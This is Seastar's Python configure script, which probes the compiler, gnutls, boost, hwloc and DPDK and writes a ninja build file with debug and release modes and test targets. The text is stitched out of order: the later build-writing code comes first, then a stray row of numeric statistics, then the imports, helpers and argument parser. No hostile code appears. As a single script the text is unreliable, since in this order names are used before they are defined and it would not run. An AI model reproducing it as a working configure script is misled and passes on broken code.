'tests/directory_test': ['tests/directory_test.cc'] + core,
'tests/linecount': ['tests/linecount.cc'] + core,
'tests/echotest': ['tests/echotest.cc'] + core + libnet,
'tests/l3_test': ['tests/l3_test.cc'] + core + libnet,
'tests/ip_test': ['tests/ip_test.cc'] + core + libnet,
'tests/tcp_test': ['tests/tcp_test.cc'] + core + libnet,
'tests/timertest': ['tests/timertest.cc'] + core,
'tests/futures_test': ['tests/futures_test.cc'] + core,
'tests/alloc_test': ['tests/alloc_test.cc'] + core,
'tests/foreign_ptr_test': ['tests/foreign_ptr_test.cc'] + core,
'tests/semaphore_test': ['tests/semaphore_test.cc'] + core,
'tests/expiring_fifo_test': ['tests/expiring_fifo_test.cc'] + core,
'tests/smp_test': ['tests/smp_test.cc'] + core,
'tests/thread_test': ['tests/thread_test.cc'] + core,
'tests/thread_context_switch': ['tests/thread_context_switch.cc'] + core,
'tests/udp_server': ['tests/udp_server.cc'] + core + libnet,
'tests/udp_client': ['tests/udp_client.cc'] + core + libnet,
'tests/tcp_sctp_server': ['tests/tcp_sctp_server.cc'] + core + libnet,
'tests/tcp_sctp_client': ['tests/tcp_sctp_client.cc'] + core + libnet,
'tests/tls_test': ['tests/tls_test.cc'] + core + libnet,
'tests/fair_queue_test': ['tests/fair_queue_test.cc'] + core,
'apps/seawreck/seawreck': ['apps/seawreck/seawreck.cc', 'http/http_response_parser.rl'] + core + libnet,
'apps/fair_queue_tester/fair_queue_tester': ['apps/fair_queue_tester/fair_queue_tester.cc'] + core,
'apps/iotune/iotune': ['apps/iotune/iotune.cc'] + ['core/resource.cc', 'core/fsqual.cc'],
'tests/blkdiscard_test': ['tests/blkdiscard_test.cc'] + core,
'tests/sstring_test': ['tests/sstring_test.cc'] + core,
'tests/unwind_test': ['tests/unwind_test.cc'] + core,
'tests/defer_test': ['tests/defer_test.cc'] + core,
'tests/httpd': ['tests/httpd.cc'] + http + core,
'tests/allocator_test': ['tests/allocator_test.cc'] + core,
'tests/output_stream_test': ['tests/output_stream_test.cc'] + core + libnet,
'tests/udp_zero_copy': ['tests/udp_zero_copy.cc'] + core + libnet,
'tests/shared_ptr_test': ['tests/shared_ptr_test.cc'] + core,
'tests/weak_ptr_test': ['tests/weak_ptr_test.cc'] + core,
'tests/checked_ptr_test': ['tests/checked_ptr_test.cc'] + core,
'tests/slab_test': ['tests/slab_test.cc'] + core,
'tests/fstream_test': ['tests/fstream_test.cc'] + core,
'tests/distributed_test': ['tests/distributed_test.cc'] + core,
'tests/rpc': ['tests/rpc.cc'] + core + libnet,
'tests/rpc_test': ['tests/rpc_test.cc'] + core + libnet,
'tests/packet_test': ['tests/packet_test.cc'] + core + libnet,
'tests/connect_test': ['tests/connect_test.cc'] + core + libnet,
'tests/chunked_fifo_test': ['tests/chunked_fifo_test.cc'] + core,
'tests/circular_buffer_test': ['tests/circular_buffer_test.cc'] + core,
'tests/perf/perf_fstream': ['tests/perf/perf_fstream.cc'] + core,
'tests/json_formatter_test': ['tests/json_formatter_test.cc'] + core + http,
'tests/dns_test': ['tests/dns_test.cc'] + core + libnet,
'tests/execution_stage_test': ['tests/execution_stage_test.cc'] + core,
'tests/lowres_clock_test': ['tests/lowres_clock_test.cc'] + core,
'tests/program_options_test': ['tests/program_options_test.cc'] + core,
'tests/tuple_utils_test': ['tests/tuple_utils_test.cc'],
'tests/tls_echo_server': ['tests/tls_echo_server.cc'] + core + libnet,
'tests/tls_simple_client': ['tests/tls_simple_client.cc'] + core + libnet,
'tests/circular_buffer_fixed_capacity_test': ['tests/circular_buffer_fixed_capacity_test.cc'],
'tests/scheduling_group_demo': ['tests/scheduling_group_demo.cc'] + core,
'tests/noncopyable_function_test': ['tests/noncopyable_function_test.cc'],
}
boost_tests = [
'tests/memcached/test_ascii_parser',
'tests/fileiotest',
'tests/futures_test',
'tests/alloc_test',
'tests/foreign_ptr_test',
'tests/semaphore_test',
'tests/expiring_fifo_test',
'tests/thread_test',
'tests/tls_test',
'tests/fair_queue_test',
'tests/httpd',
'tests/output_stream_test',
'tests/fstream_test',
'tests/rpc_test',
'tests/connect_test',
'tests/json_formatter_test',
'tests/dns_test',
'tests/execution_stage_test',
'tests/lowres_clock_test',
]
for bt in boost_tests:
deps[bt] += boost_test_lib
warnings = [
'-Wno-mismatched-tags', # clang-only
'-Wno-pessimizing-move', # clang-only: moving a temporary object prevents copy elision
'-Wno-redundant-move', # clang-only: redundant move in return statement
'-Wno-inconsistent-missing-override', # clang-only: 'x' overrides a member function but is not marked 'override'
'-Wno-unused-private-field', # clang-only: private field 'x' is not used
'-Wno-unknown-attributes', # clang-only: unknown attribute 'x' ignored (x in this case is gnu::externally_visible)
'-Wno-unneeded-internal-declaration', # clang-only: 'x' function 'x' declared in header file shouldb e declared 'x'
'-Wno-undefined-inline', # clang-only: inline function 'x' is not defined
'-Wno-overloaded-virtual', # clang-only: 'x' hides overloaded virtual functions
'-Wno-maybe-uninitialized',
'-Wno-sign-compare',
]
# The "--with-osv=<path>" parameter is a shortcut for a bunch of other
# settings:
if args.with_osv:
args.so = True
args.hwloc = False
args.user_cflags = (args.user_cflags +
' -DDEFAULT_ALLOCATOR -fvisibility=default -DHAVE_OSV -I' +
args.with_osv + ' -I' + args.with_osv + '/include -I' +
args.with_osv + '/arch/x64')
if args.allocator_page_size:
args.user_cflags += ' -DSEASTAR_OVERRIDE_ALLOCATOR_PAGE_SIZE=' + str(args.allocator_page_size)
dpdk_arch_xlat = {
'native': 'native',
'nehalem': 'nhm',
'westmere': 'wsm',
'sandybridge': 'snb',
'ivybridge': 'ivb',
}
dpdk_machine = 'native'
if args.dpdk:
if not os.path.exists('dpdk') or not os.listdir('dpdk'):
raise Exception('--enable-dpdk: dpdk/ is empty. Run "git submodule update --init".')
cflags = args.user_cflags.split()
dpdk_machine = ([dpdk_arch_xlat[cflag[7:]]
for cflag in cflags
if cflag.startswith('-march')] or ['native'])[0]
subprocess.check_call('make -C dpdk RTE_OUTPUT=$PWD/build/dpdk/ config T=x86_64-native-linuxapp-gcc'.format(
dpdk_machine=dpdk_machine),
shell = True)
# adjust configutation to taste
dotconfig = 'build/dpdk/.config'
lines = open(dotconfig, encoding='UTF-8').readlines()
def update(lines, vars):
ret = []
for line in lines:
for var, val in vars.items():
if line.startswith(var + '='):
line = var + '=' + val + '\n'
ret.append(line)
return ret
lines = update(lines, {'CONFIG_RTE_LIBRTE_PMD_BOND': 'n',
'CONFIG_RTE_MBUF_SCATTER_GATHER': 'n',
'CONFIG_RTE_LIBRTE_IP_FRAG': 'n',
'CONFIG_RTE_APP_TEST': 'n',
'CONFIG_RTE_TEST_PMD': 'n',
'CONFIG_RTE_MBUF_REFCNT_ATOMIC': 'n',
'CONFIG_RTE_MAX_MEMSEG': '8192',
'CONFIG_RTE_EAL_IGB_UIO': 'n',
'CONFIG_RTE_LIBRTE_KNI': 'n',
'CONFIG_RTE_KNI_KMOD': 'n',
'CONFIG_RTE_LIBRTE_JOBSTATS': 'n',
'CONFIG_RTE_LIBRTE_LPM': 'n',
'CONFIG_RTE_LIBRTE_ACL': 'n',
'CONFIG_RTE_LIBRTE_POWER': 'n',
'CONFIG_RTE_LIBRTE_IP_FRAG': 'n',
'CONFIG_RTE_LIBRTE_METER': 'n',
'CONFIG_RTE_LIBRTE_SCHED': 'n',
'CONFIG_RTE_LIBRTE_DISTRIBUTOR': 'n',
'CONFIG_RTE_LIBRTE_PMD_CRYPTO_SCHEDULER': 'n',
'CONFIG_RTE_LIBRTE_REORDER': 'n',
'CONFIG_RTE_LIBRTE_PORT': 'n',
'CONFIG_RTE_LIBRTE_TABLE': 'n',
'CONFIG_RTE_LIBRTE_PIPELINE': 'n',
})
lines += 'CONFIG_RTE_MACHINE={}'.format(dpdk_machine)
open(dotconfig, 'w', encoding='UTF-8').writelines(lines)
args.dpdk_target = os.getcwd() + '/build/dpdk'
if args.dpdk_target:
args.user_cflags = (args.user_cflags +
' -DHAVE_DPDK -I' + args.dpdk_target + '/include ' +
dpdk_cflags(args.dpdk_target) +
' -Wno-error=literal-suffix -Wno-literal-suffix -Wno-invalid-offsetof')
libs += (' -L' + args.dpdk_target + '/lib ')
if args.with_osv:
libs += '-lintel_dpdk -lrt -lm -ldl'
else:
libs += '-Wl,--whole-archive -lrte_pmd_vmxnet3_uio -lrte_pmd_i40e -lrte_pmd_ixgbe -lrte_pmd_e1000 -lrte_pmd_ring -lrte_pmd_bnxt -lrte_pmd_cxgbe -lrte_pmd_ena -lrte_pmd_enic -lrte_pmd_fm10k -lrte_pmd_nfp -lrte_pmd_qede -lrte_pmd_sfc_efx -lrte_hash -lrte_kvargs -lrte_mbuf -lrte_ethdev -lrte_eal -lrte_mempool -lrte_mempool_ring -lrte_ring -lrte_cmdline -lrte_cfgfile -Wl,--no-whole-archive -lrt -lm -ldl'
args.user_cflags += ' -I{srcdir}/fmt'.format(**globals())
if not args.staticboost:
args.user_cflags += ' -DBOOST_TEST_DYN_LINK'
warnings = [w
for w in warnings
if warning_supported(warning = w, compiler = args.cxx)]
warnings = ' '.join(warnings)
dbgflag = debug_flag(args.cxx) if args.debuginfo else ''
tests_link_rule = 'link' if args.tests_debuginfo else 'link_stripped'
sanitize_flags = sanitize_vptr_flag(args.cxx)
visibility_flags = adjust_visibility_flags(args.cxx)
visibility_flags = '-fvisibility=hidden ' + visibility_flags
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>'):
print('Seastar requires gnutls. Install gnutls-devel/libgnutls-dev')
sys.exit(1)
if not try_compile(args.cxx, '#include <gnutls/gnutls.h>\nint x = GNUTLS_NONBLOCK;'):
print('Seastar requires gnutls >= 2.8. Install libgnutls28-dev or later.')
sys.exit(1)
if not try_compile(args.cxx, '#include <experimental/string_view>', ['-std=gnu++1y']):
print('Seastar requires g++ >= 4.9. Install g++-4.9 or later (use --compiler option).')
sys.exit(1)
if not try_compile(args.cxx, '''#include <boost/version.hpp>\n\
#if BOOST_VERSION < 105500\n\
#error "Invalid boost version"\n\
#endif'''):
print("Seastar requires boost >= 1.55")
sys.exit(1)
modes['debug']['sanitize'] += ' ' + sanitize_flags
def have_hwloc():
return try_compile(compiler = args.cxx, source = '#include <hwloc.h>\n#include <numa.h>')
if apply_tristate(args.hwloc, test = have_hwloc,
note = 'Note: hwloc-devel/numactl-devel not installed. No NUMA support.',
missing = 'Error: required packages hwloc-devel/numactl-devel not installed.'):
libs += ' ' + hwloc_libs
defines.append('HAVE_HWLOC')
defines.append('HAVE_NUMA')
if try_compile(args.cxx, source = textwrap.dedent('''\
#include <lz4.h>
void m() {
LZ4_compress_default(static_cast<const char*>(0), static_cast<char*>(0), 0, 0);
}
''')):
defines.append("HAVE_LZ4_COMPRESS_DEFAULT")
if try_compile_and_link(args.cxx, flags=['-fsanitize=address'], source = textwrap.dedent('''\
#include <cstddef>
extern "C" {
void __sanitizer_start_switch_fiber(void**, const void*, size_t);
void __sanitizer_finish_switch_fiber(void*, const void**, size_t*);
}
int main() {
__sanitizer_start_switch_fiber(nullptr, nullptr, 0);
__sanitizer_finish_switch_fiber(nullptr, nullptr, nullptr);
}
''')):
defines.append("HAVE_ASAN_FIBER_SUPPORT")
if args.embedded_static:
args.pie = ''
args.fpie = '-fPIC'
visibility_flags = visibility_flags.replace('-fvisibility=hidden ', '')
modes[args.mode]['cares_opts'] += ' -DCMAKE_C_FLAGS=-fPIC'
elif args.so:
args.pie = '-shared'
args.fpie = '-fpic'
elif args.pie:
args.pie = '-pie'
args.fpie = '-fpie'
else:
args.pie = ''
args.fpie = ''
defines = ' '.join(['-D' + d for d in defines])
globals().update(vars(args))
total_memory = os.sysconf('SC_PAGE_SIZE') * os.sysconf('SC_PHYS_PAGES')
link_pool_depth = max(int(total_memory / 7e9), 1)
build_modes = modes if args.mode == 'all' else [args.mode]
build_artifacts = all_artifacts if not args.artifacts else args.artifacts
dpdk_sources = []
if args.dpdk:
for root, dirs, files in os.walk('dpdk'):
dpdk_sources += [os.path.join(root, file)
for file in files
if file.endswith('.h') or file.endswith('.c')]
dpdk_sources = ' '.join(dpdk_sources)
# both source and builddir location
cares_dir = 'c-ares'
cares_lib = 'cares-seastar'
cares_src_lib = cares_dir + '/lib/libcares.a'
if not os.path.exists(cares_dir) or not os.listdir(cares_dir):
raise Exception(cares_dir + ' is empty. Run "git submodule update --init".')
cares_sources = []
for root, dirs, files in os.walk('c-ares'):
cares_sources += [os.path.join(root, file)
for file in files
if file.endswith('.h') or file.endswith('.c')]
cares_sources = ' '.join(cares_sources)
libs += ' -l' + cares_lib
# "libs" contains mostly pre-existing libraries, but if we want to add to
# it a library which we built here, we need to ensure that this library
# gets built before actually using "libs". So let's make a list "built_libs"
# of libraries which are targets built here. These libraries are all relative
# to the current mode's build directory.
built_libs = []
built_libs += ['lib' + cares_lib + '.a']
outdir = 'build'
buildfile = 'build.ninja'
os.makedirs(outdir, exist_ok = True)
do_sanitize = True
if args.static:
do_sanitize = False
with open(buildfile, 'w') as f:
dpdk_deps = ''
if args.dpdk:
# fake dependencies on dpdk, so that it is built before anything else
dpdk_deps = ' {dpdk_target}/include/rte_eal.h {dpdk_target}/lib/librte_eal.a'.format(dpdk_target=args.dpdk_target)
f.write(textwrap.dedent('''\
configure_args = {configure_args}
builddir = {outdir}
full_builddir = {srcdir}/$builddir
cxx = {cxx}
# we disable _FORTIFY_SOURCE because it generates false positives with longjmp() (core/thread.cc)
cxxflags = -std=gnu++1y {dbgflag} {fpie} -Wall -Wno-unused-variable -Wno-unused-but-set-variable -Wno-error=deprecated-declarations {visibility_flags} -pthread -I{srcdir} -U_FORTIFY_SOURCE {user_cflags} {warnings} {defines}
ldflags = {dbgflag} -Wl,--no-as-needed {static} {pie} {visibility_flags} -pthread {user_ldflags}
libs = {libs}
pool link_pool
depth = {link_pool_depth}
rule ragel
# sed away a bug in ragel 7 that emits some extraneous _nfa* variables
# (the $$ is collapsed to a single one by ninja)
command = ragel -G2 -o $out $in && sed -i -e '1h;2,$$H;$$!d;g' -re 's/static const char _nfa[^;]*;//g' $out
description = RAGEL $out
rule gen
command = /bin/echo -e $text > $out
description = GEN $out
rule swagger
command = json/json2code.py -f $in -o $out
description = SWAGGER $out
rule protobuf
command = protoc --cpp_out=$outdir $in
description = PROTOC $out
rule copy_file
command = cp $in $out
''').format(**globals()))
if args.dpdk:
f.write(textwrap.dedent('''\
rule dpdkmake
command = make -C build/dpdk CC={args.cc}
build {dpdk_deps} : dpdkmake {dpdk_sources}
''').format(**globals()))
for mode in build_modes:
objdeps = {}
modeval = modes[mode]
if modeval['sanitize'] and not do_sanitize:
print('Note: --static disables debug mode sanitizers')
modeval['sanitize'] = ''
modeval['sanitize_libs'] = ''
elif modeval['sanitize']:
modeval['sanitize'] += ' -DASAN_ENABLED'
f.write(textwrap.dedent('''\
cxxflags_{mode} = {sanitize} {opt} -I$full_builddir/{mode}/gen -I$full_builddir/{mode}/c-ares
libs_{mode} = {sanitize_libs} {libs}
rule cxx.{mode}
command = $cxx -MD -MT $out -MF $out.d $cxxflags_{mode} $cxxflags -c -o $out $in
description = CXX $out
depfile = $out.d
rule link.{mode}
command = $cxx $cxxflags_{mode} -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
description = LINK $out
pool = link_pool
rule link_stripped.{mode}
command = $cxx $cxxflags_{mode} -s -L$builddir/{mode} $ldflags -o $out $in $libs $libs_{mode} $extralibs
description = LINK (stripped) $out
pool = link_pool
rule ar.{mode}
command = rm -f $out; ar cr $out $in; ranlib $out
description = AR $out
''').format(mode = mode, **modeval))
f.write('build {mode}: phony $builddir/{mode}/lib{cares_lib}.a {artifacts}\n'.format(mode = mode, cares_lib=cares_lib,
artifacts = str.join(' ', ('$builddir/' + mode + '/' + x for x in build_artifacts))))
f.write(textwrap.dedent('''\
rule caresmake_{mode}
command = make -C build/{mode}/{cares_dir} CC={args.cc}
rule carescmake_{mode}
command = mkdir -p $builddir/{mode}/{cares_dir} && cd $builddir/{mode}/{cares_dir} && CC={args.cc} cmake {cares_opts} {srcdir}/$in
build $builddir/{mode}/{cares_dir}/Makefile : carescmake_{mode} {cares_dir}
build $builddir/{mode}/{cares_dir}/ares_build.h : phony $builddir/{mode}/{cares_dir}/Makefile
build $builddir/{mode}/{cares_src_lib} : caresmake_{mode} $builddir/{mode}/{cares_dir}/Makefile | {cares_sources}
build $builddir/{mode}/lib{cares_lib}.a : copy_file $builddir/{mode}/{cares_src_lib}
''').format(cares_opts=(modeval['cares_opts']), **globals()))
objdeps['$builddir/' + mode + '/net/dns.o'] = ' $builddir/' + mode + '/' + cares_dir + '/ares_build.h'
compiles = {}
ragels = {}
swaggers = {}
protobufs = {}
for binary in build_artifacts:
srcs = deps[binary]
objs = ['$builddir/' + mode + '/' + src.replace('.cc', '.o')
for src in srcs
if src.endswith('.cc')]
objs += ['$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.o')
for src in srcs
if src.endswith('.proto')]
if binary.endswith('.pc'):
vars = modeval.copy()
vars.update(globals())
pc = textwrap.dedent('''\
Name: Seastar
URL: http://seastar-project.org/
Description: Advanced C++ framework for high-performance server applications on modern hardware.
Version: 1.0
Libs: -L$full_builddir/{mode} -Wl,--whole-archive,-lseastar,--no-whole-archive $cxxflags $cxflags_{mode} -Wl,--no-as-needed {static} {pie} {user_ldflags} {sanitize_libs} {libs}
Cflags: $cxxflags $cxxflags_{mode}
''').format(**vars)
f.write('build $builddir/{}/{}: gen\n text = {}\n'.format(mode, binary, repr(pc)))
elif binary.endswith('.a'):
f.write('build $builddir/{}/{}: ar.{} {}\n'.format(mode, binary, mode, str.join(' ', objs)))
else:
libdeps = str.join(' ', ('$builddir/{}/{}'.format(mode, i) for i in built_libs))
extralibs = []
if binary.startswith('tests/'):
if binary in boost_tests:
extralibs += [maybe_static(args.staticboost, '-lboost_unit_test_framework')]
# Our code's debugging information is huge, and multiplied
# by many tests yields ridiculous amounts of disk space.
# So we strip the tests by default; The user can very
# quickly re-link the test unstripped by adding a "_g"
# to the test name, e.g., "ninja build/release/testname_g"
f.write('build $builddir/{}/{}: {}.{} {} | {} {}\n'.format(mode, binary, tests_link_rule, mode, str.join(' ', objs), dpdk_deps, libdeps))
f.write(' extralibs = {}\n'.format(' '.join(extralibs)))
f.write('build $builddir/{}/{}_g: link.{} {} | {} {}\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps))
f.write(' extralibs = {}\n'.format(' '.join(extralibs)))
else:
f.write('build $builddir/{}/{}: link.{} {} | {} {} $builddir/{}/lib{}.a\n'.format(mode, binary, mode, str.join(' ', objs), dpdk_deps, libdeps, mode, cares_lib))
for src in srcs:
if src.endswith('.cc'):
obj = '$builddir/' + mode + '/' + src.replace('.cc', '.o')
compiles[obj] = src
elif src.endswith('.proto'):
hh = '$builddir/' + mode + '/gen/' + src.replace('.proto', '.pb.h')
protobufs[hh] = src
compiles[hh.replace('.h', '.o')] = hh.replace('.h', '.cc')
elif src.endswith('.rl'):
hh = '$builddir/' + mode + '/gen/' + src.replace('.rl', '.hh')
ragels[hh] = src
elif src.endswith('.json'):
hh = '$builddir/' + mode + '/gen/' + src + '.hh'
swaggers[hh] = src
else:
raise Exception('No rule for ' + src)
for obj in compiles:
src = compiles[obj]
gen_headers = list(ragels.keys()) + list(swaggers.keys()) + list(protobufs.keys())
f.write('build {}: cxx.{} {} || {} \n'.format(obj, mode, src, ' '.join(gen_headers) + dpdk_deps + objdeps.get(obj, '')))
for hh in ragels:
src = ragels[hh]
f.write('build {}: ragel {}\n'.format(hh, src))
for hh in swaggers:
src = swaggers[hh]
f.write('build {}: swagger {} | json/json2code.py\n'.format(hh,src))
for pb in protobufs:
src = protobufs[pb]
c_pb = pb.replace('.h','.cc')
outd = os.path.dirname(os.path.dirname(pb))
f.write('build {} {}: protobuf {}\n outdir = {}\n'.format(c_pb, pb, src, outd))
f.write(textwrap.dedent('''\
rule configure
command = python3 configure.py $configure_args
generator = 1
build build.ninja: configure | configure.py
rule cscope
command = find -name '*.[chS]' -o -name "*.cc" -o -name "*.hh" | cscope -bq -i-
description = CSCOPE
build cscope: cscope
rule md2html
command = pandoc --self-contained --toc -c doc/template.css -V documentclass=report --chapters --number-sections -f markdown_github+pandoc_title_block --highlight-style tango $in -o $out
description = PANDOC $out
rule md2pdf
command = pandoc -f markdown_github+pandoc_title_block --highlight-style tango --template=doc/template.tex $in -o $out
description = PANDOC $out
build doc/tutorial.html: md2html doc/tutorial.md
build doc/tutorial.pdf: md2pdf doc/tutorial.md
default {modes_list}
''').format(modes_list = ' '.join(build_modes), **globals()))
| 44.028754 | 411 | 0.596619 |
import os, os.path, textwrap, argparse, sys, shlex, subprocess, tempfile, re
configure_args = str.join(' ', [shlex.quote(x) for x in sys.argv[1:]])
tempfile.tempdir = "./build/tmp"
srcdir = os.getcwd()
def get_flags():
with open('/proc/cpuinfo') as f:
for line in f:
if line.strip():
if line.rstrip('\n').startswith('flags'):
return re.sub(r'^flags\s+: ', '', line).split()
def add_tristate(arg_parser, name, dest, help):
arg_parser.add_argument('--enable-' + name, dest = dest, action = 'store_true', default = None,
help = 'Enable ' + help)
arg_parser.add_argument('--disable-' + name, dest = dest, action = 'store_false', default = None,
help = 'Disable ' + help)
def apply_tristate(var, test, note, missing):
if (var is None) or var:
if test():
return True
elif var == True:
print(missing)
sys.exit(1)
else:
print(note)
return False
return False
def dpdk_cflags (dpdk_target):
ensure_tmp_dir_exists()
with tempfile.NamedTemporaryFile() as sfile:
dpdk_target = os.path.abspath(dpdk_target)
dpdk_target = re.sub(r'\/+$', '', dpdk_target)
dpdk_sdk_path = os.path.dirname(dpdk_target)
dpdk_target_name = os.path.basename(dpdk_target)
dpdk_arch = dpdk_target_name.split('-')[0]
if args.dpdk:
dpdk_sdk_path = 'dpdk'
dpdk_target = os.getcwd() + '/build/dpdk'
dpdk_target_name = 'x86_64-{}-linuxapp-gcc'.format(dpdk_machine)
dpdk_arch = 'x86_64'
sfile.file.write(bytes('include ' + dpdk_sdk_path + '/mk/rte.vars.mk' + "\n", 'utf-8'))
sfile.file.write(bytes('all:' + "\n\t", 'utf-8'))
sfile.file.write(bytes('@echo $(MACHINE_CFLAGS)' + "\n", 'utf-8'))
sfile.file.flush()
dpdk_cflags = subprocess.check_output(['make', '--no-print-directory',
'-f', sfile.name,
'RTE_SDK=' + dpdk_sdk_path,
'RTE_OUTPUT=' + dpdk_target,
'RTE_TARGET=' + dpdk_target_name,
'RTE_SDK_BIN=' + dpdk_target,
'RTE_ARCH=' + dpdk_arch])
dpdk_cflags_str = dpdk_cflags.decode('utf-8')
dpdk_cflags_str = re.sub(r'\n+$', '', dpdk_cflags_str)
dpdk_cflags_final = ''
return dpdk_cflags_str
def try_compile(compiler, source = '', flags = []):
return try_compile_and_link(compiler, source, flags = flags + ['-c'])
def ensure_tmp_dir_exists():
if not os.path.exists(tempfile.tempdir):
os.makedirs(tempfile.tempdir)
def try_compile_and_link(compiler, source = '', flags = []):
ensure_tmp_dir_exists()
with tempfile.NamedTemporaryFile() as sfile:
ofile = tempfile.mktemp()
try:
sfile.file.write(bytes(source, 'utf-8'))
sfile.file.flush()
# output file based on the name of the output file, and "/dev/null.gcsa" is not a good name
return subprocess.call([compiler, '-x', 'c++', '-o', ofile, sfile.name] + args.user_cflags.split() + flags,
stdout = subprocess.DEVNULL,
stderr = subprocess.DEVNULL) == 0
finally:
if os.path.exists(ofile):
os.unlink(ofile)
def try_compile_and_run(compiler, flags, source, env = {}):
ensure_tmp_dir_exists()
mktemp = tempfile.NamedTemporaryFile
with mktemp() as sfile, mktemp(mode='rb') as xfile:
sfile.file.write(bytes(source, 'utf-8'))
sfile.file.flush()
xfile.file.close()
if subprocess.call([compiler, '-x', 'c++', '-o', xfile.name, sfile.name] + args.user_cflags.split() + flags,
stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL) != 0:
# The compiler may delete the target on failure, and lead to
# NamedTemporaryFile's destructor throwing an exception.
open(xfile.name, 'a').close()
return False
e = os.environ.copy()
e.update(env)
env = e
return subprocess.call([xfile.name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL, env=env) == 0
def warning_supported(warning, compiler):
adjusted = re.sub('^-Wno-', '-W', warning)
return try_compile(flags = [adjusted, '-Werror'], compiler = compiler)
def debug_flag(compiler):
src_with_auto = textwrap.dedent('''\
template <typename T>
struct x { auto f() {} };
x<int> a;
''')
if try_compile(source = src_with_auto, flags = ['-g', '-std=gnu++1y'], compiler = compiler):
return '-g'
else:
print('Note: debug information disabled; upgrade your compiler')
return ''
def sanitize_vptr_flag(compiler):
if (not try_compile(compiler, flags=['-fsanitize=vptr'])
or (try_compile_and_run(compiler, flags=['-fsanitize=undefined', '-fno-sanitize-recover'],
env={'UBSAN_OPTIONS': 'exitcode=1'}, source=textwrap.dedent('''
struct A
{
virtual ~A() {}
};
struct B : virtual A {};
struct C : virtual A {};
struct D : B, virtual C {};
int main()
{
D d;
}
'''))
and False)):
return ''
else:
print('Notice: -fsanitize=vptr is broken, disabling; some debug mode tests are bypassed.')
return '-fno-sanitize=vptr'
def adjust_visibility_flags(compiler):
flags = ['-fvisibility=hidden', '-std=gnu++1y', '-Werror=attributes']
if not try_compile(compiler, flags=flags, source=textwrap.dedent('''
template <class T>
class MyClass {
public:
MyClass() {
auto outer = [this] ()
{
auto fn = [this] { };
//use fn for something here
};
}
};
int main() {
MyClass<int> r;
}
''')):
print('Notice: disabling -Wattributes due to https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80947')
return '-Wno-attributes'
else:
return ''
modes = {
'debug': {
'sanitize': '-fsanitize=address -fsanitize=leak -fsanitize=undefined',
'sanitize_libs': '-lasan -lubsan',
'opt': '-O0 -DDEBUG -DDEBUG_SHARED_PTR -DDEFAULT_ALLOCATOR -DSEASTAR_THREAD_STACK_GUARDS -DNO_EXCEPTION_HACK',
'libs': '',
'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Debug',
},
'release': {
'sanitize': '',
'sanitize_libs': '',
'opt': '-O2 -DNDEBUG -DDEFAULT_ALLOCATOR',
'libs': '',
'cares_opts': '-DCARES_STATIC=ON -DCARES_SHARED=OFF -DCMAKE_BUILD_TYPE=Release',
},
}
tests = [
'tests/fileiotest',
'tests/directory_test',
'tests/linecount',
'tests/echotest',
'tests/l3_test',
'tests/ip_test',
'tests/timertest',
'tests/tcp_test',
'tests/futures_test',
'tests/alloc_test',
'tests/foreign_ptr_test',
'tests/smp_test',
'tests/thread_test',
'tests/thread_context_switch',
'tests/udp_server',
'tests/udp_client',
'tests/blkdiscard_test',
'tests/sstring_test',
'tests/unwind_test',
'tests/defer_test',
'tests/httpd',
'tests/memcached/test_ascii_parser',
'tests/tcp_sctp_server',
'tests/tcp_sctp_client',
'tests/allocator_test',
'tests/output_stream_test',
'tests/udp_zero_copy',
'tests/shared_ptr_test',
'tests/weak_ptr_test',
'tests/checked_ptr_test',
'tests/slab_test',
'tests/fstream_test',
'tests/distributed_test',
'tests/rpc',
'tests/semaphore_test',
'tests/expiring_fifo_test',
'tests/packet_test',
'tests/tls_test',
'tests/fair_queue_test',
'tests/rpc_test',
'tests/connect_test',
'tests/chunked_fifo_test',
'tests/circular_buffer_test',
'tests/perf/perf_fstream',
'tests/json_formatter_test',
'tests/dns_test',
'tests/execution_stage_test',
'tests/lowres_clock_test',
'tests/program_options_test',
'tests/tuple_utils_test',
'tests/tls_echo_server',
'tests/tls_simple_client',
'tests/circular_buffer_fixed_capacity_test',
'tests/noncopyable_function_test',
]
apps = [
'apps/httpd/httpd',
'apps/seawreck/seawreck',
'apps/fair_queue_tester/fair_queue_tester',
'apps/memcached/memcached',
'apps/iotune/iotune',
'tests/scheduling_group_demo',
]
all_artifacts = apps + tests + ['libseastar.a', 'seastar.pc']
arg_parser = argparse.ArgumentParser('Configure seastar')
arg_parser.add_argument('--static', dest = 'static', action = 'store_const', default = '',
const = '-static',
help = 'Static link (useful for running on hosts outside the build environment)')
arg_parser.add_argument('--embedded-static', dest = 'embedded_static', action = 'store_const', default = '',
const = '-embedded-static',
help = 'Static link with -fPIC (can be embedded in a shared library)')
arg_parser.add_argument('--pie', dest = 'pie', action = 'store_true',
help = 'Build position-independent executable (PIE)')
arg_parser.add_argument('--so', dest = 'so', action = 'store_true',
help = 'Build shared object (SO) instead of executable')
arg_parser.add_argument('--mode', action='store', choices=list(modes.keys()) + ['all'], default='all')
arg_parser.add_argument('--with', dest='artifacts', action='append', choices=all_artifacts, default=[])
arg_parser.add_argument('--cflags', action = 'store', dest = 'user_cflags', default = '',
help = 'Extra flags for the C++ compiler')
arg_parser.add_argument('--ldflags', action = 'store', dest = 'user_ldflags', default = '',
help = 'Extra flags for the linker')
arg_parser.add_argument('--compiler', action = 'store', dest = 'cxx', default = 'g++',
help = 'C++ compiler path')
arg_parser.add_argument('--c-compiler', action='store', dest='cc', default='gcc',
help = 'C compiler path (for bundled libraries such as dpdk and c-ares)')
arg_parser.add_argument('--with-osv', action = 'store', dest = 'with_osv', default = '',
help = 'Shortcut for compile for OSv')
arg_parser.add_argument('--enable-dpdk', action = 'store_true', dest = 'dpdk', default = False,
help = 'Enable dpdk (from included dpdk sources)')
arg_parser.add_argument('--dpdk-target', action = 'store', dest = 'dpdk_target', default = '',
help = 'Path to DPDK SDK target location (e.g. <DPDK SDK dir>/x86_64-native-linuxapp-gcc)')
arg_parser.add_argument('--debuginfo', action = 'store', dest = 'debuginfo', type = int, default = 1,
help = 'Enable(1)/disable(0)compiler debug information generation')
arg_parser.add_argument('--tests-debuginfo', action='store', dest='tests_debuginfo', type=int, default=0,
help='Enable(1)/disable(0)compiler debug information generation for tests')
